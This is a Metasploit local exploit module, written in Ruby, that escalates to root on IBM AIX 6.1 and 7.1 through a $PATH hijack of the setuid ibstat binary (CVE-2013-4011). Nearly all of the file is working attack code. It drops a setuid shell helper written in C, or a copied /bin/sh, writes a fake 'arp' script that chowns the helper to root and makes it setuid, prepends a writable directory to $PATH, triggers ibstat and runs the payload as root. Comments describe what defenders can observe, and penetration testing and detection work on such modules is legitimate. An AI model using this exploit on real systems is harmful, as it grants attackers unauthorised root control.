##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class Metasploit4 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Exploit::FileDropper

  # Module metadata (name, description, authors, references, platform and
  # payload compatibility, targets) plus the single "WritableDir" option,
  # which is the directory the module drops its helper files into.
  def initialize(info = {})
    super(update_info(info,
      "Name"           => "ibstat $PATH Privilege Escalation",
      "Description"    => %q{
        This module exploits the trusted $PATH environment variable of the
        SUID binary "ibstat".
      },
      "Author"         => [
        "Kristian Erik Hermansen", # original author
        "Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>", # Metasploit module
        "Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>" # Metasploit module
      ],
      "References"     => [
        ["CVE", "2013-4011"],
        ["OSVDB", "95420"],
        ["BID", "61287"],
        ["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827"],
        ["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756"]
      ],
      "Platform"       => ["unix"],
      "Arch"           => ARCH_CMD,
      # Only command payloads are accepted, and they must be able to rely
      # on perl being present on the target.
      "Payload"        => {
        "Compat" => {
          "PayloadType" => "cmd",
          "RequiredCmd" => "perl"
        }
      },
      "Targets"        => [
        ["IBM AIX Version 6.1", {}],
        ["IBM AIX Version 7.1", {}]
      ],
      "DefaultTarget"  => 1, # "IBM AIX Version 7.1"
      "DisclosureDate" => "Sep 24 2013"
    ))

    register_options([
      OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
    ], self.class)
  end

  # Vulnerability check.
  #
  # Looks for a root-owned setuid "ibstat" under /usr/sbin. This only tests
  # for the presence of such a binary; it does not determine whether the
  # fixes referenced in the module metadata have been applied, so a patched
  # system that still ships a setuid ibstat would also be reported as
  # Vulnerable.
  #
  # @return [Exploit::CheckCode] Vulnerable when the find output mentions
  #   ibstat, Safe otherwise
  def check
    find_output = cmd_exec("find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null")
    if find_output.include?("ibstat")
      return Exploit::CheckCode::Vulnerable
    end
    Exploit::CheckCode::Safe
  end

  # Exploitation sequence. The order of the cmd_exec calls below is the
  # whole contract of this method: helper files are dropped first, $PATH is
  # then prepended with WritableDir, ibstat is run, $PATH is restored, and
  # only then is the helper executed and the payload run.
  #
  # From a defender's point of view the observable footprint is: a new
  # executable and a file literally named "arp" (mode 0555) appearing in a
  # user-writable directory (default /tmp), $PATH being prepended with that
  # directory, and /usr/bin/ibstat being invoked from an ordinary user
  # shell shortly afterwards.
  def exploit
    # Re-run the check so a non-vulnerable target aborts before any file
    # is written to it.
    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    else
      print_good("Target is vulnerable.")
    end

    # root_file gets a random name; arp_file must be called exactly "arp"
    # (presumably the command ibstat resolves through $PATH — not visible
    # here, confirm against the vendor advisories above).
    root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
    arp_file = "#{datastore["WritableDir"]}/arp"

    # C helper: drops privileges to real/effective uid and gid 0 and execs
    # /bin/sh. It is only meaningful once the "arp" script below has made
    # it root-owned and setuid.
    c_file = %Q^
#include <stdio.h>
int main()
{
  setreuid(0, 0);
  setregid(0, 0);
  execve("/bin/sh", NULL, NULL);
  return 0;
}
^

    # Shell script that ibstat is expected to run as root in place of the
    # real arp: it makes root_file root-owned and setuid (mode 4555).
    arp = %Q^
#!/bin/sh
chown root #{root_file}
chmod 4555 #{root_file}
^

    if gcc_installed?
      print_status("Dropping file #{root_file}.c...")
      write_file("#{root_file}.c", c_file)
      print_status("Compiling source...")
      cmd_exec("gcc -o #{root_file} #{root_file}.c")
      print_status("Compilation completed")
      register_file_for_cleanup("#{root_file}.c")
    else
      # Without a compiler the system shell itself is copied and later made
      # setuid by the arp script.
      cmd_exec("cp /bin/sh #{root_file}")
    end
    register_file_for_cleanup(root_file)

    print_status("Writing custom arp file...")
    write_file(arp_file, arp)
    register_file_for_cleanup(arp_file)
    cmd_exec("chmod 0555 #{arp_file}")
    print_status("Custom arp file written")

    # Save the current $PATH so it can be restored after the trigger, then
    # put WritableDir in front of it. Both assignments are made in the
    # session shell via cmd_exec, so they assume the session keeps one shell
    # environment between calls.
    print_status("Updating $PATH environment variable...")
    path_env = cmd_exec("echo $PATH")
    cmd_exec("PATH=#{datastore["WritableDir"]}:$PATH")
    cmd_exec("export PATH")

    # Run the setuid binary with the modified $PATH; its output is discarded.
    print_status("Triggering vulnerablity...")
    cmd_exec("/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null")

    # The $PATH variable must be restored before the payload is executed
    # in cases where an euid root shell was gained
    print_status("Restoring $PATH environment variable...")
    cmd_exec("PATH=#{path_env}")
    cmd_exec("export PATH")

    # Execute the (hopefully now setuid) helper. Its C source execs /bin/sh,
    # so the following cmd_exec calls run inside that shell.
    cmd_exec(root_file)

    # The payload is only run once the session is confirmed to be root.
    print_status("Checking root privileges...")
    if is_root?
      print_status("Executing payload...")
      cmd_exec(payload.encoded)
    end
  end

  # Whether a gcc binary can be located on the target.
  #
  # Relies on "whereis -b gcc" printing at least one path (any "/" in the
  # output counts as found).
  #
  # @return [Boolean] true when gcc was located, false otherwise
  def gcc_installed?
    print_status("Checking if gcc exists...")
    gcc_whereis_output = cmd_exec("whereis -b gcc")
    if gcc_whereis_output.include?("/")
      print_good("gcc found!")
      return true
    end
    print_status("gcc not found. Using /bin/sh from local system")
    false
  end

  # Whether the session currently runs as root, judged from the output of
  # "id". An effective uid of 0 is checked first, then the real uid.
  #
  # @return [Boolean] true when euid or uid is 0(root), false otherwise
  def is_root?
    id_output = cmd_exec("id")
    if id_output.include?("euid=0(root)")
      print_good("Got root! (euid)")
      return true
    end
    if id_output.include?("uid=0(root)")
      print_good("Got root!")
      return true
    end
    print_status("Exploit failed")
    false
  end
end